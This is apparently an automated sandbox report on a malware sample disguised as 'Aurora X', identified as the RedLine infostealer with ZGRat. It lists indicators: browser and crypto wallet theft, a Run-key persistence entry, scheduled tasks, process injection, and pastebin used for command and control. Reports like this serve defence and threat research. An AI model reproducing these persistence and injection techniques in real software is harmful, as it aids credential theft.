Malware Analysis Report

2024-10-16 05:21

Sample ID 240301-vbnvaaab4x
Target Aurora X [by RyosX].rar
SHA256 ba00978fa3933d128d43f7be77ecd4323284b4bdf1ac80ac0315ef09802749ae
Tags
cryptone packer redline @dxrkl0rd infostealer zgrat discovery persistence rat spyware stealer
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral3

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral4

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

ba00978fa3933d128d43f7be77ecd4323284b4bdf1ac80ac0315ef09802749ae

Threat Level: Known bad

The file Aurora X [by RyosX].rar was found to be: Known bad.

Malicious Activity Summary

cryptone packer redline @dxrkl0rd infostealer zgrat discovery persistence rat spyware stealer

RedLine payload

RedLine

Detect ZGRat V1

ZGRat

CryptOne packer

Downloads MZ/PE file

Executes dropped EXE

Loads dropped DLL

Reads user/profile data of web browsers

Legitimate hosting services abused for malware hosting/C2

Checks installed software on the system

Accesses cryptocurrency files/wallets, possible credential harvesting

Adds Run key to start application

Suspicious use of SetThreadContext

Enumerates physical storage devices

Program crash

Modifies registry class

Suspicious behavior: EnumeratesProcesses

Suspicious use of WriteProcessMemory

Creates scheduled task(s)

Suspicious use of AdjustPrivilegeToken

Views/modifies file attributes

Modifies Internet Explorer settings

Suspicious use of SetWindowsHookEx

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-03-01 16:49

Signatures

CryptOne packer

cryptone packer
Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral3

Detonation Overview

Submitted

2024-03-01 16:49

Reported

2024-03-01 16:52

Platform

win7-20240221-en

Max time kernel

119s

Max time network

123s

Command Line

regsvr32 /s C:\Users\Admin\AppData\Local\Temp\Aurora_V2\scripts\scripts.dll

Signatures

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\NavigatorPluginsList\Shockwave Flash C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\NavigatorPluginsList\Shockwave Flash\application/futuresplash C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\NavigatorPluginsList\Shockwave Flash\application/x-shockwave-flash C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\ActiveX Compatibility\{D27CDB70-AE6D-11cf-96B8-444553540000} C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\ActiveX Compatibility\{D27CDB70-AE6D-11cf-96B8-444553540000}\Compatibility Flags = "65536" C:\Windows\SysWOW64\regsvr32.exe N/A

Modifies registry class

Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\ShockwaveFlash.ShockwaveFlash.3\CLSID\ = "{D27CDB6E-AE6D-11cf-96B8-444553540000}" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\ShockwaveFlash.ShockwaveFlash.17\CLSID\ = "{D27CDB6E-AE6D-11cf-96B8-444553540000}" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\ShockwaveFlash.ShockwaveFlash\ = "Shockwave Flash Object" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{D27CDB6D-AE6D-11CF-96B8-444553540000}\ProxyStubClsid32\ = "{00020420-0000-0000-C000-000000000046}" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{D27CDB6D-AE6D-11CF-96B8-444553540000}\TypeLib C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\ShockwaveFlash.ShockwaveFlash.3\CLSID C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\ShockwaveFlash.ShockwaveFlash.9\CLSID\ = "{D27CDB6E-AE6D-11cf-96B8-444553540000}" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{D27CDB6D-AE6D-11CF-96B8-444553540000}\ProxyStubClsid32\ = "{00020420-0000-0000-C000-000000000046}" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{D27CDB6D-AE6D-11CF-96B8-444553540000}\ = "_IShockwaveFlashEvents" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\FlashFactory.FlashFactory.1\CLSID C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\FlashFactory.FlashFactory.1\CLSID\ = "{D27CDB70-AE6D-11cf-96B8-444553540000}" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\ShockwaveFlash.ShockwaveFlash.18\CLSID\ = "{D27CDB6E-AE6D-11cf-96B8-444553540000}" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\ShockwaveFlash.ShockwaveFlash.23\CLSID\ = "{D27CDB6E-AE6D-11cf-96B8-444553540000}" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}\MiscStatus C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB70-AE6D-11cf-96B8-444553540000}\InprocServer32\ThreadingModel = "Apartment" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{D27CDB6B-AE6D-11CF-96B8-444553540000}\1.0\0\win32\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Aurora_V2\\scripts\\scripts.dll" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB70-AE6D-11cf-96B8-444553540000}\ = "Macromedia Flash Factory Object" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB70-AE6D-11cf-96B8-444553540000}\TypeLib C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\ShockwaveFlash.ShockwaveFlash.3\ = "Shockwave Flash Object" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{86230738-D762-4C50-A2DE-A753E5B1686F}\ = "IFlashObject" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\MacromediaFlashPaper.MacromediaFlashPaper\ = "Macromedia Flash Paper" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\ShockwaveFlash.ShockwaveFlash.16 C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}\InprocServer32 C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}\InprocServer32\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Aurora_V2\\scripts\\scripts.dll" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{D27CDB6C-AE6D-11CF-96B8-444553540000}\ProxyStubClsid32 C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{D27CDB6C-AE6D-11CF-96B8-444553540000}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\FlashFactory.FlashFactory.1 C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\ShockwaveFlash.ShockwaveFlash.10\CLSID C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}\TypeLib\ = "{D27CDB6B-AE6D-11cf-96B8-444553540000}" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB70-AE6D-11cf-96B8-444553540000}\VersionIndependentProgID C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB70-AE6D-11cf-96B8-444553540000}\Programmable C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\MacromediaFlashPaper.MacromediaFlashPaper\shell C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\ShockwaveFlash.ShockwaveFlash.14\CLSID C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.sor\Content Type = "text/plain" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{D27CDB6C-AE6D-11CF-96B8-444553540000} C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{D27CDB6D-AE6D-11CF-96B8-444553540000} C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\ShockwaveFlash.ShockwaveFlash.5\CLSID\ = "{D27CDB6E-AE6D-11cf-96B8-444553540000}" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\ShockwaveFlash.ShockwaveFlash\CurVer C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{86230738-D762-4C50-A2DE-A753E5B1686F}\TypeLib\ = "{D27CDB6B-AE6D-11CF-96B8-444553540000}" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{86230738-D762-4C50-A2DE-A753E5B1686F}\TypeLib\Version = "1.0" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\MacromediaFlashPaper.MacromediaFlashPaper\CLSID\ = "{D27CDB6E-AE6D-11cf-96B8-444553540000}" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\ShockwaveFlash.ShockwaveFlash.14\ = "Shockwave Flash Object" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}\ToolboxBitmap32\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Aurora_V2\\scripts\\scripts.dll, 1" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}\Implemented Categories\{59FB2056-D625-48D0-A944-1A85B5AB2640} C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{86230738-D762-4C50-A2DE-A753E5B1686F}\TypeLib\Version = "1.0" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\ShockwaveFlash.ShockwaveFlash.21\ = "Shockwave Flash Object" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}\Implemented Categories C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{86230738-D762-4C50-A2DE-A753E5B1686F}\ = "IFlashObject" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\FlashFactory.FlashFactory.1\ = "Macromedia Flash Factory Object" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\ShockwaveFlash.ShockwaveFlash.14 C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\ShockwaveFlash.ShockwaveFlash.17 C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB70-AE6D-11cf-96B8-444553540000}\ProgID C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{86230738-D762-4C50-A2DE-A753E5B1686F}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\ShockwaveFlash.ShockwaveFlash.7 C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\ShockwaveFlash.ShockwaveFlash.13\ = "Shockwave Flash Object" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\ShockwaveFlash.ShockwaveFlash.16\ = "Shockwave Flash Object" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}\EnableFullPage\.mfp C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{D27CDB6B-AE6D-11CF-96B8-444553540000}\1.0\HELPDIR C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\ShockwaveFlash.ShockwaveFlash.7\CLSID C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}\Version C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{D27CDB6C-AE6D-11CF-96B8-444553540000}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\MacromediaFlashPaper.MacromediaFlashPaper\DefaultIcon C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\ShockwaveFlash.ShockwaveFlash.3 C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}\EnableFullPage\.swf C:\Windows\SysWOW64\regsvr32.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2324 wrote to memory of 3024 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2324 wrote to memory of 3024 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2324 wrote to memory of 3024 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2324 wrote to memory of 3024 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2324 wrote to memory of 3024 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2324 wrote to memory of 3024 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2324 wrote to memory of 3024 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe

Processes

C:\Windows\system32\regsvr32.exe

regsvr32 /s C:\Users\Admin\AppData\Local\Temp\Aurora_V2\scripts\scripts.dll

C:\Windows\SysWOW64\regsvr32.exe

/s C:\Users\Admin\AppData\Local\Temp\Aurora_V2\scripts\scripts.dll

Network

N/A

Files

N/A

Analysis: behavioral4

Detonation Overview

Submitted

2024-03-01 16:49

Reported

2024-03-01 16:52

Platform

win10-20240221-en

Max time kernel

122s

Max time network

142s

Command Line

regsvr32 /s C:\Users\Admin\AppData\Local\Temp\Aurora_V2\scripts\scripts.dll

Signatures

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4176 wrote to memory of 4360 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 4176 wrote to memory of 4360 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 4176 wrote to memory of 4360 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe

Processes

C:\Windows\system32\regsvr32.exe

regsvr32 /s C:\Users\Admin\AppData\Local\Temp\Aurora_V2\scripts\scripts.dll

C:\Windows\SysWOW64\regsvr32.exe

/s C:\Users\Admin\AppData\Local\Temp\Aurora_V2\scripts\scripts.dll

Network

Country Destination Domain Proto
NL 52.142.223.178:80 tcp
US 138.91.171.81:80 tcp
US 8.8.8.8:53 11.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 173.178.17.96.in-addr.arpa udp

Files

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-03-01 16:49

Reported

2024-03-01 16:52

Platform

win7-20240221-en

Max time kernel

120s

Max time network

124s

Command Line

"C:\Users\Admin\AppData\Local\Temp\Aurora_V2\Aurora.exe"

Signatures

RedLine

infostealer redline

RedLine payload

Description Indicator Process Target
N/A N/A N/A N/A

Processes

C:\Users\Admin\AppData\Local\Temp\Aurora_V2\Aurora.exe

"C:\Users\Admin\AppData\Local\Temp\Aurora_V2\Aurora.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2756 -s 520

Network

N/A

Files

memory/2756-0-0x0000000000120000-0x0000000000170000-memory.dmp

memory/2756-4-0x0000000074820000-0x0000000074F0E000-memory.dmp

memory/2756-5-0x0000000074820000-0x0000000074F0E000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-03-01 16:49

Reported

2024-03-01 16:52

Platform

win10-20240221-en

Max time kernel

132s

Max time network

137s

Command Line

"C:\Users\Admin\AppData\Local\Temp\Aurora_V2\Aurora.exe"

Signatures

Detect ZGRat V1

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

RedLine

infostealer redline

RedLine payload

Description Indicator Process Target
N/A N/A N/A N/A

ZGRat

rat zgrat

Downloads MZ/PE file

Reads user/profile data of web browsers

spyware stealer

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-1104443672-3570440473-4052989528-1000\Software\Microsoft\Windows\CurrentVersion\Run\kwweifjdskdv = "C:\\Users\\Admin\\AppData\\Local\\kwweifjdskdv\\kwweifjdskdv.exe" C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Checks installed software on the system

discovery

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 2788 set thread context of 776 N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 1872 set thread context of 4252 N/A C:\Users\Admin\AppData\Local\Temp\main\Installer.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Enumerates physical storage devices

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Aurora_V2\Aurora.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: 35 N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: 35 N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: 35 N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2364 wrote to memory of 3092 N/A C:\Users\Admin\AppData\Local\Temp\Aurora_V2\Aurora.exe C:\Users\Admin\AppData\Local\Temp\conhost.exe
PID 2364 wrote to memory of 3092 N/A C:\Users\Admin\AppData\Local\Temp\Aurora_V2\Aurora.exe C:\Users\Admin\AppData\Local\Temp\conhost.exe
PID 2364 wrote to memory of 3092 N/A C:\Users\Admin\AppData\Local\Temp\Aurora_V2\Aurora.exe C:\Users\Admin\AppData\Local\Temp\conhost.exe
PID 3092 wrote to memory of 4012 N/A C:\Users\Admin\AppData\Local\Temp\conhost.exe C:\Windows\system32\cmd.exe
PID 3092 wrote to memory of 4012 N/A C:\Users\Admin\AppData\Local\Temp\conhost.exe C:\Windows\system32\cmd.exe
PID 4012 wrote to memory of 984 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\mode.com
PID 4012 wrote to memory of 984 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\mode.com
PID 4012 wrote to memory of 5112 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\main\7z.exe
PID 4012 wrote to memory of 5112 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\main\7z.exe
PID 4012 wrote to memory of 2516 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\main\7z.exe
PID 4012 wrote to memory of 2516 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\main\7z.exe
PID 4012 wrote to memory of 3464 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\main\7z.exe
PID 4012 wrote to memory of 3464 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\main\7z.exe
PID 4012 wrote to memory of 1712 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\attrib.exe
PID 4012 wrote to memory of 1712 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\attrib.exe
PID 4012 wrote to memory of 1872 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\main\Installer.exe
PID 4012 wrote to memory of 1872 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\main\Installer.exe
PID 4012 wrote to memory of 1872 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\main\Installer.exe
PID 2364 wrote to memory of 2788 N/A C:\Users\Admin\AppData\Local\Temp\Aurora_V2\Aurora.exe C:\Users\Admin\AppData\Local\Temp\svchost.exe
PID 2364 wrote to memory of 2788 N/A C:\Users\Admin\AppData\Local\Temp\Aurora_V2\Aurora.exe C:\Users\Admin\AppData\Local\Temp\svchost.exe
PID 2364 wrote to memory of 2788 N/A C:\Users\Admin\AppData\Local\Temp\Aurora_V2\Aurora.exe C:\Users\Admin\AppData\Local\Temp\svchost.exe
PID 2788 wrote to memory of 3628 N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 2788 wrote to memory of 3628 N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 2788 wrote to memory of 3628 N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 2788 wrote to memory of 776 N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 2788 wrote to memory of 776 N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 2788 wrote to memory of 776 N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 2788 wrote to memory of 776 N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 2788 wrote to memory of 776 N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 2788 wrote to memory of 776 N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 2788 wrote to memory of 776 N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 2788 wrote to memory of 776 N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 1872 wrote to memory of 4252 N/A C:\Users\Admin\AppData\Local\Temp\main\Installer.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 1872 wrote to memory of 4252 N/A C:\Users\Admin\AppData\Local\Temp\main\Installer.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 1872 wrote to memory of 4252 N/A C:\Users\Admin\AppData\Local\Temp\main\Installer.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 1872 wrote to memory of 4252 N/A C:\Users\Admin\AppData\Local\Temp\main\Installer.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 1872 wrote to memory of 4252 N/A C:\Users\Admin\AppData\Local\Temp\main\Installer.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 4252 wrote to memory of 1124 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\SysWOW64\cmd.exe
PID 4252 wrote to memory of 1124 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\SysWOW64\cmd.exe
PID 4252 wrote to memory of 1124 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\SysWOW64\cmd.exe
PID 1124 wrote to memory of 208 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1124 wrote to memory of 208 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
